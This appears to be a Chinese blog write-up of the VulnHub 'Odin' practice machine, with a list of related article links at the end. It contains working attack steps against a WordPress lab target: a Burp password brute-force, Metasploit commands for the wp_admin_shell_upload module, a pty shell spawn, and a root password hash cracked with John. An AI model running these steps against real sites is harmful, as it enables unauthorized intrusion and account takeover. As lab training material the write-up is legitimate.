vulnhub--odin

最新推荐文章于 2024-01-17 15:27:01 发布
最新推荐文章于 2024-01-17 15:27:01 发布
阅读量198 收藏 1
点赞数
分类专栏: vulnhub靶场 文章标签: 渗透测试 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45922278/article/details/113761729
版权

描述

难度:容易

奥丁以乔格海姆(Vegtam)的行者的名义冒险前往约特海姆(Jötunheim)附近的米米尔(Mimir)井。守卫井的米米尔(Mimir)允许他从井里喝水,他要求他牺牲左眼,这是他获取知识的意愿的象征

请添加/ etc / hosts-> ip vm + odin

例如:192.168.1.1 odin

推特:@ArmBjorn

在Virtualbox中工作。

获取root权限

由于靶机中许多许多url使用了odin,没有动态获取,因此需要加一条本地dns

编辑C:\Windows\System32\drivers\etc\hosts

底部添加 IP地址 odin

目录

一、信息收集

1.nmap端口扫描:

2.dirsearch目录扫描:

二、漏洞探测&利用

1. burp爆破

2. getshell

1.过上传插件的方式将我们的一句话木马插入到根目录中

2 . metasploit反弹shell

四、提权

1.查询www下的配置文件wp-config.php

2.john解密

五、总结

 

一、信息收集

1.nmap端口扫描:

2.dirsearch目录扫描:

python3 dirsearch.py -u 192.168.155.132 -e php

 

找到后台目录,访问http://odin/wp-login.php

 

二、漏洞探测&利用

1. burp爆破

用户名admin密码不正确,burp爆破。

密码为:qwerty

 

登入后台管理。

2. getshell

1.过上传插件的方式将我们的一句话木马插入到根目录中

但是找不到文件的绝对路径。

2 . metasploit反弹shell

search wordpress shell 

搜索与wordpress 的payload

use exploit/unix/webapp/wp_admin_shell_upload

options

set password qwerty

set username admin

set rhost 192.168.155.132  #目标ip

run

shell

python3 -c "import pty;pty.spawn('/bin/bash')"

 

四、提权

1.查询www下的配置文件wp-config.php

 

2.john解密

/** root:$6$e9hWlnuTuxApq8h6$ClVqvF9MJa424dmU96Hcm6cvevBGP1OaHbWg//71DVUF1kt7ROW160rv9oaL7uKbDr2qIGsSxMmocdudQzjb01:18600:0:99999:7:::*/

将密文保存到pass.txt

john pass.txt  && john --show pass.txt

解得:root/jasmine

3.su

su root

 

五、总结

  • 知道cms的管理员的账号密码,但很难利用上传点时,msf> use exploit/unix/webapp/wp_admin_shell_upload
  • john解密
New6ie
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Odin - Inspector and Serializer
08-29
Odin - Inspector and Serializer
Odin3-v3.13.1
05-03
Odin3-v3.13.1】是一款专门针对三星(Samsung)设备的刷机工具,主要用于固件升级、系统恢复或者个性化定制等操作。这个版本的Odin支持美版和欧版的Samsung Galaxy S8,使得用户可以自行进行设备的系统修改,提升...
vulnhub-Odin
weixin_55638067的博客
04-01 3283
靶机下载地址:https://download.vulnhub.com/odin/odin.ova 靶机描述: 一、环境信息 靶机:192.168.163.139 攻击机:192.168.163.128 二、信息收集 Nmap -sS -A -n -p- 192.168.163.139 这里可以看到开放了80端口 访问后是加载不出来的,在靶机描述里其实有提示需要我们将靶机添加到hosts里 将192.168.163.139 odin添加到hosts里后再次访问页面就会有网页弹出来了
vulnhub靶机odin
m0_73248913的博客
01-17 372
vulnhub靶机
vulnhub靶机-ODIN: 1
臭nana的博客
01-06 1502
靶机描述: 1、找到靶机ip:192.168.75.14 nmap -sn 192.168.75.14 2、扫描靶机端口 root@chounana:~# nmap -p- -A 192.168.75.14 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for odin (192.168.75.14) Host is up (0.00047s latency). Not shown: 65534 closed ports
实战靶场Odin
biejianghua的博客
02-21 125
每日一学
odin 靶机wp
m0_52496313的博客
09-22 162
odin 靶机wp
VulnHub渗透测试实战靶场 - Odin:1
LYJ20010728的博客
08-25 498
VulnHub渗透测试实战靶场 - Odin:1题目描述环境下载NULLY CYBERSECURITY: 1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 题目描述 Odin ventured to the Well of Mimir, near Jötunheim, the land of the giants in the guise of a walker named Vegtam. Mímir, who guarded the well, to allow him to drink from
unity插件Odin - Inspector and Serializer
最新发布
03-29
Odin - Inspector and Serializer 2.1.13.unitypackage Odin - Inspector and Serializer 3.0.13.unitypackage Odin Inspector 3.0.1.unitypackage Odin Inspector and Serializer 3.1.10.unitypackage
Odin - Inspector and Serializer 3.0.4.unitypackage
03-15
Odin - Inspector and Serializer 3.0.4
Odin - Inspector and Serializer 3.0.13
02-28
Odin - Inspector and Serializer 3.0.13:Unity开发中的高效工具》 在Unity游戏开发领域,效率和可维护性是开发者们追求的重要目标。Odin - Inspector and Serializer 3.0.13是一款针对Unity引擎的插件,它提供...
vulnhub--DriftingBlues: 1
weixin_45922278的博客
03-28 1142
描述 获得标志 难度:容易 关于vm:已测试并从virtualbox导出 目录 1.nmap端口扫描 2.目录扫描 二、漏洞探测&利用 三、getshell & 提权 四、总结 一、信息收集 1.nmap端口扫描 nmap -A -T4 -v -p- 192.168.43.73 2.目录扫描 先将driftingblues.box加入到hosts文件中。 gobuster dir -u http://driftingblues.box...
vulnhub--hackme2-DHCP
weixin_45922278的博客
02-24 917
描述 “ hackme2”是中等难度级别的框。这是hackme系列的第二部分,其中更多的控制措施可以阻止恶意攻击。此外,您还必须开箱即用,以利用漏洞。目标是通过Web漏洞获得受限的特权访问,然后特权以root用户身份升级。该实验室的创建是为了模拟现实世界中的网络漏洞。 “ hackme2”使用DHCP并可能在mysqld自行关闭(非常罕见的情况)的情况下,尝试强制重启机器,并且随后应能正常工作。 https://idc.wanyunshuju.com/vul/1947.html 一、信息...
vulnhub--LinEsc
weixin_45922278的博客
02-15 860
描述 LinEsc是一台旨在演示Linux特权升级的7种最常见方式的机器。 目标:通过7种不同方式获得root特权。 默认凭据:(muhammad:nasef) 靶机下载地址:http://www.vulnhub.com/entry/linesc-1,616/ Linux提权技术合集: https://mp.weixin.qq.com/s?__biz=MzAwMjc0NTEzMw==&mid=2653571678&idx=1&sn=67c068ff3eb6406...
vulnhub--Leeroy:1
weixin_45922278的博客
03-16 755
描述 深入了解不仅仅是典型的漏洞利用 一、信息收集 1.nmap端口扫描 1)nmap -sP 192.168.1.* 找到靶机ip。 2)nmap -sS -v -p- 192.168.1.178 二、漏洞探测&利用 1.初步探测。 1)http://192.168.1.178,查看源码,无有用信息,下载图片,图片正常没有隐藏信息。 2)192.168.1.178:8080, Jenkins是一个开源软件项目,是基于java开发的一种持...
vulnhub--devguru
weixin_45922278的博客
02-10 671
描述 DevGuru是一家虚构的Web开发公司,它聘请您进行渗透测试。您的任务是在他们的公司网站上查找漏洞并获得根。 就像OSCP一样〜现实生活为基础 难度:中级(取决于经验) 目录 一、信息搜集 1.nmap端口扫描: 2.dirsearch目录扫描: 二、漏洞探测&利用 1 . GitHack.py 2.登入cms后台 1)写入一句话木马。 2)或者反弹shell 3.获取gitea数据库密码 1)在github 找到加密方式(大佬方式) 2)在gethub上...
vulnhub--ALFA: 1
weixin_45922278的博客
03-23 477
描述 难度:中等 标记:2(用户和root) 枚举Web应用程序蛮力|特权提升 格式:虚拟机(Virtualbox-OVA) 操作系统:Linux Debian 10(x64) DHCP服务:已启用 目录 一、信息收集 1.nmap 端口扫描 2.目录扫描 二、漏洞探测 1.匿名登入ftp。 2.一一访问web目录 3.扫描用户名 三、漏洞利用 1.制作特定的密码字典 2.ssh爆破 3.登入ssh 四、提权(ssh代理转发) 五、总结 一、信息收集...
vulnhub:Ragnar-lothbrok
weixin_45922278的博客
03-09 459
描述 Google && Wikipedia是您的朋友 难度:容易 “当小猪知道公猪遭受了怎样的痛苦时,他们会如何尖叫” 请添加/ etc / hosts-> ip vm + armbjorn 推特:@ArmBjorn 在Virtualbox中工作。 获取root权限 一、信息收集 1.nmap端口扫描 2.http服务目录扫描器 python3 dirsearch.py -u http://192.168.152.130 -e php ...
odin - inspector and serializer
03-16
Odin是一个Unity编辑器扩展,它提供了一个强大的检查器和序列化器,可以帮助开发者更方便地管理和编辑Unity对象。Odin可以自定义Inspector界面,使其更加易于使用和美观,同时还可以对对象进行序列化和反序列化操作...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值